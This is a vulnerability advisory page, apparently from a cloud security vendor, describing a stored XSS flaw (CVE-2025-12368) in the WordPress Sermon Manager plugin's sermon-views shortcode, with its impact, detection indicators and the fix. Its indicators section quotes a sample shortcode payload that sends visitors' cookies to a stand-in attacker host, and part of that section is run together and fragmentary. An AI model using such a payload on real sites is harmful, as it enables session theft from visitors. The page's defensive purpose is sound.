
Cloud Vulnerability DB
A community-led vulnerabilities database
CVE-2025-12368 is a Stored Cross-Site Scripting (XSS) vulnerability in the Sermon Manager plugin for WordPress, affecting all versions up to and including 2.30.0. The flaw exists in the sermon-views shortcode due to insufficient input sanitization and output escaping on user-supplied attributes. It was published on December 5, 2025, and assigned by Wordfence. The vulnerability carries a CVSS v3.1 base score of 6.4 (Medium) (Wordfence, Red Hat CVE).
The root cause is classified as CWE-79 (Improper Neutralization of Input During Web Page Generation — Cross-site Scripting). The vulnerability resides in the entry-views.php file (specifically around line 114 in version 2.30.0), where user-supplied attributes passed to the sermon-views shortcode are neither properly sanitized on input nor escaped on output. An authenticated attacker with at least Contributor-level access can embed a malicious shortcode containing arbitrary JavaScript into a WordPress page or post; the script executes in the browser of any user who subsequently visits the affected page (Wordfence, ENISA EUVD).
Successful exploitation allows an authenticated attacker to persistently inject malicious JavaScript that executes in the context of any site visitor's browser, impacting confidentiality (e.g., session cookie theft, credential harvesting) and integrity (e.g., page content manipulation, phishing redirects). Availability is not directly impacted. Because the injected script runs in a changed scope (affecting visitors beyond the attacker's own session), the potential for widespread user compromise on high-traffic WordPress sites is significant (Wordfence, ENISA EUVD).
No public proof-of-concept exploit code or in-the-wild exploitation has been reported as of the available data. The vulnerability requires authenticated access at the Contributor level or above, which limits the attack surface compared to unauthenticated flaws. The EPSS score is approximately 0.029% (0.000290), indicating a low probability of exploitation in the near term. The vulnerability is not listed in the CISA Known Exploited Vulnerabilities (KEV) catalog (Wordfence, ENISA EUVD).
readme.txt files.sermon-views shortcode with a malicious attribute, e.g., [sermon-views attribute="<script>document.location='https://attacker.com/steal?c='+document.cookie</script>"].[sermon-views] shortcode content containing <script>, javascript:, or encoded variants (e.g., <script>) by low-privileged user accounts.wp_posts table) containing obfuscated or encoded JavaScript within shortcode attributes.sermon-views shortcode, potentially carrying cookie or session data in query parameters.sermon-views shortcode from diverse IP addresses following content submission by a Contributor account.Site administrators should update the Sermon Manager plugin to version 2.30.1 or later, which contains the fix for this vulnerability (Wordfence). As an interim workaround, restrict Contributor-level user registration and review existing Contributor accounts for suspicious content submissions. Web Application Firewalls (WAFs) with XSS filtering rules can provide additional defense-in-depth. Audit existing posts and pages for malicious shortcode content if the site has untrusted Contributor accounts.
Source: This report was generated using AI
Free Vulnerability Assessment
Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.
Get a personalized demo
"Best User Experience I have ever seen, provides full visibility to cloud workloads."
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
"We know that if Wiz identifies something as critical, it actually is."